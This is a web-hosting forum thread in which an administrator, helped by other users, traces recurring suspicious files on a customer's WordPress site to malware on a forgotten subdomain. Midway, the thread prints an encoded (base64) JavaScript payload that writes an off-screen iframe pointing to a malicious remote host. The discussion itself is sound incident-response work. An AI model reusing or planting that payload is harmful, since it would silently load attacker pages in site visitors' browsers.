Suspicious files

[SeLLeRoNe]

Thanks John, i did already check that (actually was almost the first thing i did check) but there is no cron for that user...

Usually i use to find bad pages and code.. but this time.. i feel sad cause is like a month or more that im in this situation and i've to apply workaround like this:

chmod 700 /dev/shm/.svn
chown root:root /dev/shm/.svn

for prevent script to write/use that folder

Regards

 

[scsi]

I would just pay a security expert to look at it if you are quite concerned. I have no other ideas without looking at it myself. This could even be encoded such as the eval statement you found before. You could also post on larger forums such as webhostingtalk.com to see what they say.

 

[SeLLeRoNe]

Is not that i'm in panic, is just too bad that i cannot find out by myself what is, actually, the script cant run, the workaround is just for dont have csf emails... So, actually look not as an high security risk but just a "warning".

Thanks for your help.

Regards

 

[ditto]

@SeLLeRoNe You have probably done most of this already, but here is my thought: I would ask the customer to deactivate and delete any WordPress plugin that is not absolutely needed, and also delete any WordPress theme that is not used anymore. If problem then still continue, I would download a new fresh copy of WordPress from wordpress.org, and then delete all files in wp-includes and wp-admin directory and all WordPress installation files in public_html, so that you only keep his plugins and images etc, and then upload the new fresh files. I would even delete wp-config.php and generate it manually again. Create a new database password. Then also ask the customer to change his WordPress admin password. I would also manually look in the wp-includes/uploads for php files and wp-includes/plugins folders for files and content that would not belong there.

Edit: Maybe ask in WordPress own forum at http://wordpress.org/support/

 

[toml]

A .svn folder indicates that someone attempted to do a checkout of an svn repository. It could be that it was a rouge script or plugin doing something. Instead of looking for .svn, look for something like 'svn co' or 'svn checkout' which would be the command used to check out a source tree. In turn it would also create a .svn folder that would contain pristine files of files that may be worked on in the working directory (the directory that contains the .svn folder), plus it should have a few other files. What was the contents of that directory? There is normally a clue in that directory as to where the repository was, since that is how svn knows what repository to update the files.

Perhaps it was someone trying to inject a virus using svn to pull it down, and removed the working one to hide his/her tracks but overlooked the .svn directory.

 

[SeLLeRoNe]

Thanks for this hint, i did think aswell about a temp svn check for updates or so.

This is the output:

All the file that have svn co are the timthumb.php files and have this:

        3. Check-out the latest version of CutyCapt with the following command: svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt

Should be related?

No references for svn checkout

Thanks

 

[toml]

You could try executing that command

svn co https://cutycapt.svn.sourceforge.net/svnroot/cutycapt

and comparing the contents of that checkout's .svn folder to the one you have in /dev/shm and if they are the same, then that is where it came from. Doing the svn co will not execute or install anything bad, it will only copy files done from the repository.

 

[SeLLeRoNe]

This is the content:

totale 4,0K
totale 4,0K
-rwxrwxrwx 1 username username   0 14 set 19:58 120914
-rwxrwxrwx 1 username username   0 14 set 19:55 312294301bf0cc7df00be903d4422b01112091405
-rwxrwxrwx 1 username username 316 14 set 19:55 312294301bf0cc7df00be903d4422b0112091405
-rw-r--r-- 1 username username   0 14 set 19:55 r

All files are empty except this:

>cat 312294301bf0cc7df00be903d4422b0112091405
Yzg3YTRvMWs9JzxpZnJhbWUgc3JjPSJodHRwOi8vY29udC1yaWJ1dGUuY29tLmJyLnRjOjgxL3JlbTIuaHRtbCIgZnJhbWVib3JkZXI9MCBtYXJnaW5oZWlnaHQ9MCBtYXJnaW53aWR0aD0wIHNjcm9sbGluZz0ibm8iIGFsbG93VHJhbnNwYXJlbmN5PSJ0cnVlIiBzdHlsZT0id2lkdGg6NDhweDtwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi0yMTcwcHg7Ij48L2lmcmFtZT4nOyBkb2N1bWVudC53cml0ZShjODdhNG8xayk7

Regards

 

[SeLLeRoNe]

Compared that svn checkout, file dont match.

Regards

 

[toml]

Yeah, I did the co and looked at it, there wasn't a match. The code you show, looks like it is some encrypted javascript. After decrypting the contents here http://www5.rptea.com/base64/ it is someone trying inject an iframe into some html, then trying to load a buttload of urls on the 95.211.193.19 ip address. This is not some benign code.

 

[SeLLeRoNe]

Thanks for this, gonna check some references on code and logs with this.

Thanks

Regards

 

[SeLLeRoNe]

Where did you get IP 95.211.193.19? the one decripted point to a different IP.

Regards

 

[toml]

I did a wget (so it would only download the html not execute anything) on the URL embedded in the script and looked at the code there. It was in the res2.html file.

 

[SeLLeRoNe]

Oh ok But i cant see any ref in logs.. so.. the orignal attacker ofc doesnt not use that page or ips...

That suck

Thanks for your help

 

[toml]

I doubt you will see them in your logs, since they were meant for users browsing a page on your server to execute that code. Their browser would be doing all the decoding/executing and opening all those pages. The trick now is to find out where it is coming from to make sure no one gets to execute that script. Somewhere there has to be a reference to it. The sad part, is that the infected code could be encrypted too like the contents here and finding it would be difficult. You may want to take a few lines of characters from that file and do a search for that, to see if any files contain it.

 

[SeLLeRoNe]

Checked for references of single part of code and file names but none came out.

Probably is a bot, cause the only folder he place those file to is /dev/shm/.svn

Damn them

 

[SeLLeRoNe]

I wanna thank everyone.

I did finally found and solved the problem.

Customer has a subdomain not linked ( so i didnt notice it and checked ) with a malware in homepage.

Once noticed that subdomain i did scan with http://sucuri.net/ and this website noticed me about the malware.

For do that i did move all folders in a non-web area and putted back one by one with 3hrs delay between every folder, once i did put the last one and visited the site the .svn folder did reappear. Website was offline and not linked, was just for backup.. but was unsecure so with my customer we did decide to remove it definitly.

Also notice that the DB did not have any reference on the malware so was some encoded code inside pages.

The page had a javascript cripted code that was creating an ifram to a remote site.

Thanks everyone for the support and suggestions.

Best regards